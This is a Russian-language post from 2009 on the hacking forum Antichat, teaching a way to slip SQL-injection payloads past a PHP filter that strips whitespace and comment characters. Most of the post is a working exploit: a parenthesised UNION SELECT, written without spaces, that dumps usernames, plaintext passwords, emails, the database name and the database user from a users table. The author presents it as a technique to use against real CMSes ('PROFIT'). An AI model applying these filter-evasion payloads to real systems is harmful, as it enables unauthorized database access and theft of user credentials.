Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Небольшой очерк 2 - Фильтрация |
18.06.2009, 00:17
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
Небольшой очерк 2 - Фильтрация
Тянет меня видимо раз в полгода писать что то подобное.
Суть очерка - показать возможность выкрутиться при sql-inj и составить нормальный запрос обходя фильтрацию спецсимволов в GPC:
-Пробел %2B, +
-Табуляция %09
-Возврат каретки %0D
-Перевод строки %0A
-Составляющие комментариев -, /, *
*Примечание: дальнейшее описание имеет смысл только если после уязвимого параметра в теле запроса нет ничего что бы могло помешать логике, и не
пришлось бы использовать комментарии
1. Например вот такой скрипт фильтрации:
PHP код:
$str = str_replace('/', '',
str_replace('*', '',
str_replace('=', '',
str_replace('+', '',
str_replace(' ', '',
str_replace('%2B', '',
str_replace('%0B', '',
str_replace('%09', '',
str_replace('$0D', '',
str_replace('%0A', '', $str))))))))));
Видно что он всё порежет. Тут помогут скобки ( ) , с их помощью можно вообще не пользоваться какими либо другими разделителями инструкций/выражений etc.
2. PoC
Код:
mysql> select * from news;
+---------+-----------+------------+---------------+
| news_id | news_name | news_theme | news |
+---------+-----------+------------+---------------+
| 1 | news1 | theme1 | newsnewsnews1 |
| 2 | news2 | theme2 | newsnewsnews2 |
+---------+-----------+------------+---------------+
2 rows in set
mysql> select * from users;
+----+----------+--------+--------------+
| id | username | pwd | email |
+----+----------+--------+--------------+
| 1 | admin | 12345 | 1234@1234.ru |
| 2 | user | qwerty | user@123.ru |
| 3 | user1 | 0000 | ffff@fff.ru |
+----+----------+--------+--------------+
3 rows in set
---
Код:
mysql> select news_name, news_theme, news from news where news_id=1;
Допустим параметр news_id как раз мы можем изменить, тогда:
Код:
mysql> select news_name, news_theme, news from news where news_id=(-1)union(select(1),(2),(3));
+-----------+------------+------+
| news_name | news_theme | news |
+-----------+------------+------+
| 1 | 2 | 3 |
+-----------+------------+------+
1 row in set
Ну вы понели..
---
Код:
mysql> select news_name, news_theme, news from news where news_id=(-1)union(select(concat_ws(0x3a,id,username,pwd,email)),(concat_ws(0x3a,database(),user())),(null)from(users)where(id)like(1));
+----------------------------+---------------------+------+
| news_name | news_theme | news |
+----------------------------+---------------------+------+
| 1:admin:12345:1234@1234.ru | test:root@localhost | NULL |
+----------------------------+---------------------+------+
1 row in set
Фильтр успешно обходится. Дальше только ваша фантазия.
3 ...
4 PROFIT
PS
Кстати встречались такие цмс, где приходилось обходиться скобками. Редко, но бывает.
PPS Примеров можно приводить море, но направление я дал, дальше уже и сами сможете потестить.
PPPS Если не понятна логика построения таких запросов, спрашивайте.
eof
Последний раз редактировалось .Slip; 18.06.2009 в 02:00..
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Древовидный вид